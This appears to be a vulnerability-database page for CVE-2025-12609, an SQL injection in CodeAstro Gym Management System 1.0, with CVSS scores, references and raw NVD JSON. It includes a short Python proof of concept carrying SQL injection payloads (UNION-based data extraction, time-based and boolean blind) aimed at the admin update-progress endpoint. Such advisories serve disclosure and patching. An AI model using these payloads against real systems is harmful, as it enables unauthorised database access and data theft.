CVE-2025-12609

Description

A vulnerability was found in CodeAstro Gym Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/update-progress.php. Performing a manipulation of the argument id/ini_weight results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

CodeAstro Gym Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12609 PoC - CodeAstro Gym Management System SQL Injection
# Target: /admin/update-progress.php
# Parameters: id, ini_weight
# Note: Requires admin privileges

import requests
import sys

target_url = "http://target.com/admin/update-progress.php"

# SQL Injection payload examples:
# 1. Basic injection to confirm vulnerability
payload_basic = "1' OR '1'='1"

# 2. UNION-based injection to extract data
payload_union = "1' UNION SELECT NULL,NULL,NULL,user(),database(),version()-- -"

# 3. Time-based blind injection
payload_time = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- -"

# 4. Boolean-based blind injection
payload_boolean = "1' AND 1=1-- -"

def test_sql_injection(payload, param_name='id'):
    """Test SQL injection vulnerability"""
    headers = {
        'Cookie': 'PHPSESSID=admin_session_id',  # Requires valid admin session
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    data = {
        param_name: payload,
        'ini_weight': 'test'
    }
    
    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

if __name__ == '__main__':
    print("[*] CVE-2025-12609 SQL Injection Test")
    print(f"[*] Target: {target_url}")
    
    # Test basic injection
    print("\n[*] Testing basic injection...")
    result = test_sql_injection(payload_basic)
    print(f"[+] Response received, length: {len(result)}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12609
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12609
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12609/
[4] VulDB https://vuldb.com/cve/CVE-2025-12609
[5] https://codeastro.com/
[6] https://github.com/iamzzzzz/iam/issues/1
[7] https://vuldb.com/?ctiid.330904
[8] https://vuldb.com/?id.330904
[9] https://vuldb.com/?submit.678402
[10] https://vuldb.com/?submit.678403

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12609", "sourceIdentifier": "[email protected]", "published": "2025-11-03T02:15:41.000", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in CodeAstro Gym Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/update-progress.php. Performing a manipulation of the argument id/ini_weight results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BDAFA95-39E9-4D93-9228-7D9B51DE6A3F"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/iamzzzzz/iam/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.330904", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330904", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.678402", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.678403", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}